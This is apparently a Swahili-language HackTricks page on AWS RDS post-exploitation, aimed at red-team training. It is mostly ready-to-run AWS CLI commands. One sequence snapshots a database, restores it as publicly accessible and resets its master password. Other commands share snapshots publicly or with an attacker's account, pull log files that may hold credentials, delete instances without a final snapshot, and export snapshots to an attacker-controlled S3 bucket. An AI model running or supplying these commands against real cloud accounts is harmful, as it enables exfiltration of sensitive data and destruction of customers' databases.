AWS - RDS Post Exploitation

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

RDS

Kwa maelezo zaidi angalia:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

Ikiwa mshambuliaji ana ruhusa za kutosha, anaweza kufanya DB iweze kupatikana hadharani kwa kuunda snapshot ya DB, na kisha DB inayoweza kupatikana hadharani kutoka kwa snapshot.

bash
aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

Mshambuliaji mwenye ruhusa hizi anaweza kuunda snapshot ya DB na kuifanya ipatikane hadharani. Kisha, anaweza tu kuunda katika akaunti yake mwenyewe DB kutoka kwa snapshot hiyo.

Ikiwa mshambuliaji hana rds:CreateDBSnapshot, bado anaweza kufanya snapshots nyingine zilizoundwa kuwa hadharani.

bash
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

rds:DownloadDBLogFilePortion

Mshambuliaji mwenye ruhusa ya rds:DownloadDBLogFilePortion anaweza kupakua sehemu za faili za logi za RDS. Ikiwa data nyeti au akreditivu za ufikiaji zimeandikwa kwa bahati mbaya, mshambuliaji anaweza kutumia taarifa hii kuongeza mamlaka yao au kufanya vitendo visivyoidhinishwa.

bash
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

Madhara Yanayoweza Kutokea: Ufikiaji wa taarifa nyeti au vitendo visivyoidhinishwa kwa kutumia akreditivu zilizovuja.

rds:DeleteDBInstance

Mshambuliaji mwenye ruhusa hizi anaweza kusababisha DoS kwa RDS instances zilizopo.

bash
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Madhara yanayoweza kutokea: Kufutwa kwa mifano ya RDS iliyopo, na kupoteza kwa data.

rds:StartExportTask

note

TODO: Jaribu

Mshambuliaji mwenye ruhusa hii anaweza kutoa picha ya mfano wa RDS kwenye kikasha cha S3. Ikiwa mshambuliaji ana udhibiti wa kikasha cha S3 kilichokusudiwa, wanaweza kupata data nyeti ndani ya picha iliyotolewa.

bash
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Madhara yanayoweza kutokea: Ufikiaji wa data nyeti katika picha iliyosafirishwa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks